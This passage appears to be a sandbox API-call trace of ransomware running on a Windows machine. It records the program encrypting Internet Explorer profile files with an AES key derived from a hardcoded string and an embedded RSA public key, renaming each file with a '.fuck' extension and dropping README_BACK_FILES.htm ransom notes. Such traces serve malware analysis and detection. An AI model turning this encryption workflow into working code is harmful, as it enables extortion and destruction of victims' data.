Explorer\\Recovery\\Last Active\\{94C50253-C9AC-11E7-9BDD-C40142ECDE47}.dat.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{94c50253-c9ac-11e7-9bdd-c40142ecde47}.dat.gsg")) returned 1 [0267.874] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{94C50253-C9AC-11E7-9BDD-C40142ECDE47}.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{94c50253-c9ac-11e7-9bdd-c40142ecde47}.dat"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{94C50253-C9AC-11E7-9BDD-C40142ECDE47}.dat.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{94c50253-c9ac-11e7-9bdd-c40142ecde47}.dat.fuck")) returned 1 [0267.876] CryptDestroyHash (hHash=0x2e7f140) returned 1 [0267.876] CryptDestroyKey (hKey=0x2e7f1c0) returned 1 [0267.876] CryptReleaseContext (hProv=0x2f254e8, dwFlags=0x0) returned 1 [0267.876] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0267.876] FindClose (in: hFindFile=0x2e7ec80 | out: hFindFile=0x2e7ec80) returned 1 [0267.876] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\readme_back_files.htm")) returned 0xffffffff [0267.877] AreFileApisANSI () returned 1 [0267.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2940, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 108 [0267.877] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0267.878] GetFileType (hFile=0x5d48) returned 0x1 [0267.878] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0267.881] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0267.881] FindClose (in: hFindFile=0x2e7eb80 | out: hFindFile=0x2e7eb80) returned 1 [0267.881] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\recovery\\readme_back_files.htm")) returned 0xffffffff [0267.881] AreFileApisANSI () returned 1 [0267.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889348, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0267.881] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\recovery\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0267.883] GetFileType (hFile=0x5d44) returned 0x1 [0267.883] WriteFile (in: hFile=0x5d44, lpBuffer=0x2b9d0c0*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d0b8, lpOverlapped=0x0 | out: lpBuffer=0x2b9d0c0*, lpNumberOfBytesWritten=0x2b9d0b8*=0x5ec, lpOverlapped=0x0) returned 1 [0267.885] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0267.885] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\TabRoaming\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2e7ec80 [0267.885] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0267.885] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0267.885] FindClose (in: hFindFile=0x2e7ec80 | out: hFindFile=0x2e7ec80) returned 1 [0267.885] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\TabRoaming\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\tabroaming\\readme_back_files.htm")) returned 0xffffffff [0267.886] AreFileApisANSI () returned 1 [0267.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2940, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0267.886] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\TabRoaming\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\tabroaming\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0267.890] GetFileType (hFile=0x5d44) returned 0x1 [0267.891] WriteFile (in: hFile=0x5d44, lpBuffer=0x2b9d0c0*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d0b8, lpOverlapped=0x0 | out: lpBuffer=0x2b9d0c0*, lpNumberOfBytesWritten=0x2b9d0b8*=0x5ec, lpOverlapped=0x0) returned 1 [0267.892] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0267.892] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Tiles\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2e7eb80 [0267.893] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0267.893] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0267.893] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Tiles\\pin-314712940\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2e7ec80 [0267.893] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0267.893] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0267.893] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0267.893] GetLastError () returned 0x0 [0267.894] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Tiles\\pin-314712940\\msapplication.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\tiles\\pin-314712940\\msapplication.xml")) returned 0x20 [0267.894] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Tiles\\pin-314712940\\msapplication.xml", dwFileAttributes=0x80) returned 1 [0267.895] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Tiles\\pin-314712940\\msapplication.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\tiles\\pin-314712940\\msapplication.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0267.896] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Tiles\\pin-314712940\\msapplication.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\tiles\\pin-314712940\\msapplication.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0267.898] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Tiles\\pin-314712940\\msapplication.xml.gsg", dwFileAttributes=0x2) returned 1 [0267.899] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f24b58) returned 1 [0267.901] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0267.901] lstrlenA (lpString="ENarQtORUWLZSNndbbyWVVoTzMlQm") returned 29 [0267.901] CryptHashData (hHash=0x2e7f8c0, pbData=0x28cb2d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0267.901] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2e7f8c0, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2e7f240) returned 1 [0267.902] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0267.902] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0267.902] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f25708) returned 1 [0267.902] CryptImportPublicKeyInfo (in: hCryptProv=0x2f25708, dwCertEncodingType=0x1, pInfo=0x2f30ca0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f30cd0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f30cd8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2e7f140) returned 1 [0267.902] CryptEncrypt (in: hKey=0x2e7f140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0267.902] CryptEncrypt (in: hKey=0x2e7f140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f25020*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f25020*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0267.903] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f25020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f25020*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0267.904] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x1a1, lpOverlapped=0x0) returned 1 [0267.905] CryptEncrypt (in: hKey=0x2e7f240, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x1a1, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x1b0) returned 1 [0267.905] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x1b0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x1b0, lpOverlapped=0x0) returned 1 [0267.906] CloseHandle (hObject=0x5d4c) returned 1 [0267.906] CloseHandle (hObject=0x5d3c) returned 1 [0267.906] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Tiles\\pin-314712940\\msapplication.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\tiles\\pin-314712940\\msapplication.xml.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Tiles\\pin-314712940\\msapplication.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\tiles\\pin-314712940\\msapplication.xml"), bFailIfExists=0) returned 1 [0267.910] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Tiles\\pin-314712940\\msapplication.xml", dwFileAttributes=0x0) returned 1 [0267.910] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Tiles\\pin-314712940\\msapplication.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\tiles\\pin-314712940\\msapplication.xml.gsg")) returned 1 [0267.912] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Tiles\\pin-314712940\\msapplication.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\tiles\\pin-314712940\\msapplication.xml"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Tiles\\pin-314712940\\msapplication.xml.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\tiles\\pin-314712940\\msapplication.xml.fuck")) returned 1 [0267.913] CryptDestroyHash (hHash=0x2e7f8c0) returned 1 [0267.913] CryptDestroyKey (hKey=0x2e7f240) returned 1 [0267.913] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0267.913] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0267.914] FindClose (in: hFindFile=0x2e7ec80 | out: hFindFile=0x2e7ec80) returned 1 [0267.914] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Tiles\\pin-314712940\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\tiles\\pin-314712940\\readme_back_files.htm")) returned 0xffffffff [0267.914] AreFileApisANSI () returned 1 [0267.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2d78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0267.914] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Tiles\\pin-314712940\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\tiles\\pin-314712940\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0267.915] GetFileType (hFile=0x5d48) returned 0x1 [0267.916] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0267.917] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0267.917] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Tiles\\pin7226654530\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2e7ec80 [0267.919] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0267.919] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0267.919] FindClose (in: hFindFile=0x2e7ec80 | out: hFindFile=0x2e7ec80) returned 1 [0267.919] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Tiles\\pin7226654530\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\tiles\\pin7226654530\\readme_back_files.htm")) returned 0xffffffff [0267.919] AreFileApisANSI () returned 1 [0267.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0267.920] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Tiles\\pin7226654530\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\tiles\\pin7226654530\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0267.921] GetFileType (hFile=0x5d48) returned 0x1 [0267.921] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0267.926] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0267.926] FindClose (in: hFindFile=0x2e7eb80 | out: hFindFile=0x2e7eb80) returned 1 [0267.926] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Tiles\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\tiles\\readme_back_files.htm")) returned 0xffffffff [0267.926] AreFileApisANSI () returned 1 [0267.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28895b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 93 [0267.926] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Tiles\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\tiles\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0267.928] GetFileType (hFile=0x5d44) returned 0x1 [0267.928] WriteFile (in: hFile=0x5d44, lpBuffer=0x2b9d0c0*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d0b8, lpOverlapped=0x0 | out: lpBuffer=0x2b9d0c0*, lpNumberOfBytesWritten=0x2b9d0b8*=0x5ec, lpOverlapped=0x0) returned 1 [0267.929] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0267.929] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Tracking Protection\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2e7eb80 [0267.930] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0267.930] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0267.930] FindClose (in: hFindFile=0x2e7eb80 | out: hFindFile=0x2e7eb80) returned 1 [0267.930] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Tracking Protection\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\tracking protection\\readme_back_files.htm")) returned 0xffffffff [0267.930] AreFileApisANSI () returned 1 [0267.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e29b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0267.930] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Tracking Protection\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\tracking protection\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0267.931] GetFileType (hFile=0x5d44) returned 0x1 [0267.932] WriteFile (in: hFile=0x5d44, lpBuffer=0x2b9d0c0*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d0b8, lpOverlapped=0x0 | out: lpBuffer=0x2b9d0c0*, lpNumberOfBytesWritten=0x2b9d0b8*=0x5ec, lpOverlapped=0x0) returned 1 [0267.933] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0267.933] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\VersionManager\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2e7eb80 [0267.934] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0267.934] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0267.934] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0267.934] GetLastError () returned 0x0 [0267.934] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\VersionManager\\versionlist.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\versionmanager\\versionlist.xml")) returned 0x20 [0267.934] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\VersionManager\\versionlist.xml", dwFileAttributes=0x80) returned 1 [0267.935] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\VersionManager\\versionlist.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\versionmanager\\versionlist.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0267.936] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\VersionManager\\versionlist.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\versionmanager\\versionlist.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0267.938] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\VersionManager\\versionlist.xml.gsg", dwFileAttributes=0x2) returned 1 [0267.939] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f250a8) returned 1 [0267.942] CryptCreateHash (in: hProv=0x2f250a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0267.942] lstrlenA (lpString="ENarQtORUWLZSNndbbyWVVoTzMlQm") returned 29 [0267.942] CryptHashData (hHash=0x2e7ec80, pbData=0x28cb4b8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0267.942] CryptDeriveKey (in: hProv=0x2f250a8, Algid=0x6610, hBaseData=0x2e7ec80, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2e7f1c0) returned 1 [0267.942] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0267.942] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0267.942] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, 